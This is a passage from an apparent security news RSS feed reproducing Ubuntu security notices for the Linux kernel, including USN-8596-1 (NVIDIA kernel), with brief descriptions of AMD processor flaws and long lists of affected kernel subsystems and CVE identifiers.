  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31507, CVE-2026-31508, CVE-2026-31509,
CVE-2026-31510, CVE-2026-31511, CVE-2026-31512, CVE-2026-31515,
CVE-2026-31516, CVE-2026-31518, CVE-2026-31519, CVE-2026-31520,
CVE-2026-31521, CVE-2026-31522, CVE-2026-31523, CVE-2026-31524,
CVE-2026-31525, CVE-2026-31527, CVE-2026-31528, CVE-2026-31530,
CVE-2026-31532, CVE-2026-31540, CVE-2026-31542, CVE-2026-31545,
CVE-2026-31546, CVE-2026-31548, CVE-2026-31549, CVE-2026-31550,
CVE-2026-31551, CVE-2026-31552, CVE-2026-31554, CVE-2026-31555,
CVE-2026-31556, CVE-2026-31557, CVE-2026-31563, CVE-2026-31565,
CVE-2026-31566, CVE-2026-31570, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31580, CVE-2026-31581,
CVE-2026-31582, CVE-2026-31583, CVE-2026-31584, CVE-2026-31585,
CVE-2026-31586, CVE-2026-31587, CVE-2026-31588, CVE-2026-31590,
CVE-2026-31594, CVE-2026-31595, CVE-2026-31596, CVE-2026-31597,
CVE-2026-31598, CVE-2026-31599, CVE-2026-31602, CVE-2026-31603,
CVE-2026-31604, CVE-2026-31605, CVE-2026-31606, CVE-2026-31610,
CVE-2026-31611, CVE-2026-31612, CVE-2026-31613, CVE-2026-31615,
CVE-2026-31616, CVE-2026-31617, CVE-2026-31618, CVE-2026-31619,
CVE-2026-31622, CVE-2026-31623, CVE-2026-31624, CVE-2026-31625,
CVE-2026-31626, CVE-2026-31627, CVE-2026-31628, CVE-2026-31629,
CVE-2026-31634, CVE-2026-31638, CVE-2026-31639, CVE-2026-31642,
CVE-2026-31645, CVE-2026-31646, CVE-2026-31648, CVE-2026-31651,
CVE-2026-31655, CVE-2026-31656, CVE-2026-31658, CVE-2026-31660,
CVE-2026-31661, CVE-2026-31662, CVE-2026-31664, CVE-2026-31665,
CVE-2026-31667, CVE-2026-31670, CVE-2026-31671, CVE-2026-31672,
CVE-2026-31673, CVE-2026-31674, CVE-2026-31675, CVE-2026-31677,
CVE-2026-31678, CVE-2026-31679, CVE-2026-31680, CVE-2026-31681,
CVE-2026-31683, CVE-2026-31684, CVE-2026-31686, CVE-2026-31689,
CVE-2026-31694, CVE-2026-31695, CVE-2026-31696, CVE-2026-31697,
CVE-2026-31698, CVE-2026-31699, CVE-2026-31700, CVE-2026-31701,
CVE-2026-31702, CVE-2026-31704, CVE-2026-31705, CVE-2026-31706,
CVE-2026-31707, CVE-2026-31708, CVE-2026-31709, CVE-2026-31711,
CVE-2026-31712, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31720, CVE-2026-31721, CVE-2026-31722, CVE-2026-31723,
CVE-2026-31724, CVE-2026-31725, CVE-2026-31726, CVE-2026-31728,
CVE-2026-31729, CVE-2026-31730, CVE-2026-31731, CVE-2026-31737,
CVE-2026-31738, CVE-2026-31740, CVE-2026-31741, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31767, CVE-2026-31768, CVE-2026-31770, CVE-2026-31772,
CVE-2026-31773, CVE-2026-31778, CVE-2026-31779, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43007, CVE-2026-43012,
CVE-2026-43013, CVE-2026-43014, CVE-2026-43015, CVE-2026-43016,
CVE-2026-43017, CVE-2026-43018, CVE-2026-43019, CVE-2026-43020,
CVE-2026-43023, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026,
CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43032,
CVE-2026-43035, CVE-2026-43036, CVE-2026-43040, CVE-2026-43041,
CVE-2026-43043, CVE-2026-43044, CVE-2026-43046, CVE-2026-43047,
CVE-2026-43049, CVE-2026-43050, CVE-2026-43051, CVE-2026-43052,
CVE-2026-43054, CVE-2026-43056, CVE-2026-43057, CVE-2026-43058,
CVE-2026-43059, CVE-2026-43060, CVE-2026-43061, CVE-2026-43062,
CVE-2026-43064, CVE-2026-43065, CVE-2026-43066, CVE-2026-43068,
CVE-2026-43069, CVE-2026-43072, CVE-2026-43073, CVE-2026-43074,
CVE-2026-43075, CVE-2026-43076, CVE-2026-43079, CVE-2026-43080,
CVE-2026-43081, CVE-2026-43082, CVE-2026-43084, CVE-2026-43085,
CVE-2026-43086, CVE-2026-43088, CVE-2026-43089, CVE-2026-43091,
CVE-2026-43092, CVE-2026-43093, CVE-2026-43094, CVE-2026-43098,
CVE-2026-43099, CVE-2026-43103, CVE-2026-43104, CVE-2026-43105,
CVE-2026-43107, CVE-2026-43109, CVE-2026-43110, CVE-2026-43111,
CVE-2026-43112, CVE-2026-43113, CVE-2026-43119, CVE-2026-43120,
CVE-2026-43129, CVE-2026-43162, CVE-2026-43245, CVE-2026-43252,
CVE-2026-43265, CVE-2026-43281, CVE-2026-43324, CVE-2026-43327,
CVE-2026-43328, CVE-2026-43329, CVE-2026-43330, CVE-2026-43332,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43338,
CVE-2026-43339, CVE-2026-43340, CVE-2026-43342, CVE-2026-43343,
CVE-2026-43345, CVE-2026-43350, CVE-2026-43355, CVE-2026-43357,
CVE-2026-43359, CVE-2026-43360, CVE-2026-43361, CVE-2026-43362,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43371, CVE-2026-43372, CVE-2026-43373,
CVE-2026-43377, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43386, CVE-2026-43387, CVE-2026-43395, CVE-2026-43397,
CVE-2026-43405, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43415, CVE-2026-43419,
CVE-2026-43420, CVE-2026-43421, CVE-2026-43424, CVE-2026-43425,
CVE-2026-43426, CVE-2026-43427, CVE-2026-43428, CVE-2026-43429,
CVE-2026-43430, CVE-2026-43432, CVE-2026-43436, CVE-2026-43437,
CVE-2026-43439, CVE-2026-43441, CVE-2026-43445, CVE-2026-43448,
CVE-2026-43449, CVE-2026-43450, CVE-2026-43451, CVE-2026-43452,
CVE-2026-43453, CVE-2026-43455, CVE-2026-43456, CVE-2026-43457,
CVE-2026-43458, CVE-2026-43459, CVE-2026-43466, CVE-2026-43467,
CVE-2026-43468, CVE-2026-43469, CVE-2026-43471, CVE-2026-43472,
CVE-2026-43473, CVE-2026-43475, CVE-2026-43476, CVE-2026-43480,
CVE-2026-43483, CVE-2026-43484, CVE-2026-43488, CVE-2026-43490,
CVE-2026-43491, CVE-2026-43492, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43499, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45855,
CVE-2026-45858, CVE-2026-45899, CVE-2026-45911, CVE-2026-45920,
CVE-2026-45924, CVE-2026-45942, CVE-2026-45943, CVE-2026-45956,
CVE-2026-45958, CVE-2026-45985, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45989, CVE-2026-45991, CVE-2026-45994, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46009, CVE-2026-46011, CVE-2026-46012, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46021,
CVE-2026-46022, CVE-2026-46023, CVE-2026-46024, CVE-2026-46026,
CVE-2026-46027, CVE-2026-46031, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46038, CVE-2026-46040, CVE-2026-46041, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46116, CVE-2026-46117, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46131, CVE-2026-46132, CVE-2026-46133, CVE-2026-46136,
CVE-2026-46137, CVE-2026-46138, CVE-2026-46139, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46149, CVE-2026-46150, CVE-2026-46151, CVE-2026-46152,
CVE-2026-46157, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46176, CVE-2026-46177, CVE-2026-46178, CVE-2026-46179,
CVE-2026-46180, CVE-2026-46184, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46204,
CVE-2026-46205, CVE-2026-46206, CVE-2026-46207, CVE-2026-46208,
CVE-2026-46209, CVE-2026-46211, CVE-2026-46212, CVE-2026-46214,
CVE-2026-46218, CVE-2026-46219, CVE-2026-46220, CVE-2026-46225,
CVE-2026-46226, CVE-2026-46227, CVE-2026-46229, CVE-2026-46230,
CVE-2026-46231, CVE-2026-46232, CVE-2026-46233, CVE-2026-46234,
CVE-2026-46235, CVE-2026-46236, CVE-2026-46238, CVE-2026-46241,
CVE-2026-46273, CVE-2026-46274, CVE-2026-46280, CVE-2026-46282,
CVE-2026-46285, CVE-2026-46286, CVE-2026-46287, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46296,
CVE-2026-46299, CVE-2026-46301, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46312, CVE-2026-46314,
CVE-2026-46319, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53369,
CVE-2026-53374, CVE-2026-53375, CVE-2026-53376, CVE-2026-53379,
CVE-2026-63838, CVE-2026-63843, CVE-2026-63844, CVE-2026-63845,
CVE-2026-63846, CVE-2026-63847, CVE-2026-63848, CVE-2026-63851,
CVE-2026-63852, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63860, CVE-2026-63861, CVE-2026-63862, CVE-2026-63865,
CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8596-1: Linux kernel (NVIDIA) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3688351/unix-server/usn-8596-1-linux-kernel-nvidia-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688351/unix-server/usn-8596-1-linux-kernel-nvidia-vulnerabilities/</guid>
<pubDate>Thu, 23 Jul 2026 10:20:28 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23226, CVE-2026-23227, CVE-2026-23244, CVE-2026-23245,
CVE-2026-23246, CVE-2026-23253, CVE-2026-23255, CVE-2026-23270,
CVE-2026-23271, CVE-2026-23276, CVE-2026-23277, CVE-2026-23279,
CVE-2026-23281, CVE-2026-23284, CVE-2026-23285, CVE-2026-23286,
CVE-2026-23287, CVE-2026-23289, CVE-2026-23290, CVE-2026-23291,
CVE-2026-23292, CVE-2026-23293, CVE-2026-23296, CVE-2026-23298,
CVE-2026-23300, CVE-2026-23302, CVE-2026-23303, CVE-2026-23304,
CVE-2026-23306, CVE-2026-23307, CVE-2026-23308, CVE-2026-23310,
CVE-2026-23312, CVE-2026-23313, CVE-2026-23315, CVE-2026-23317,
CVE-2026-23318, CVE-2026-23319, CVE-2026-23321, CVE-2026-23324,
CVE-2026-23325, CVE-2026-23330, CVE-2026-23334, CVE-2026-23335,
CVE-2026-23336, CVE-2026-23339, CVE-2026-23340, CVE-2026-23343,
CVE-2026-23347, CVE-2026-23352, CVE-2026-23356, CVE-2026-23357,
CVE-2026-23359, CVE-2026-23360, CVE-2026-23361, CVE-2026-23362,
CVE-2026-23363, CVE-2026-23364, CVE-2026-23365, CVE-2026-23367,
CVE-2026-23368, CVE-2026-23369, CVE-2026-23370, CVE-2026-23372,
CVE-2026-23374, CVE-2026-23375, CVE-2026-23378, CVE-2026-23379,
CVE-2026-23381, CVE-2026-23382, CVE-2026-23383, CVE-2026-23386,
CVE-2026-23387, CVE-2026-23388, CVE-2026-23389, CVE-2026-23391,
CVE-2026-23395, CVE-2026-23396, CVE-2026-23397, CVE-2026-23398,
CVE-2026-23399, CVE-2026-23401, CVE-2026-23412, CVE-2026-23413,
CVE-2026-23414, CVE-2026-23418, CVE-2026-23419, CVE-2026-23420,
CVE-2026-23426, CVE-2026-23434, CVE-2026-23438, CVE-2026-23439,
CVE-2026-23440, CVE-2026-23441, CVE-2026-23442, CVE-2026-23444,
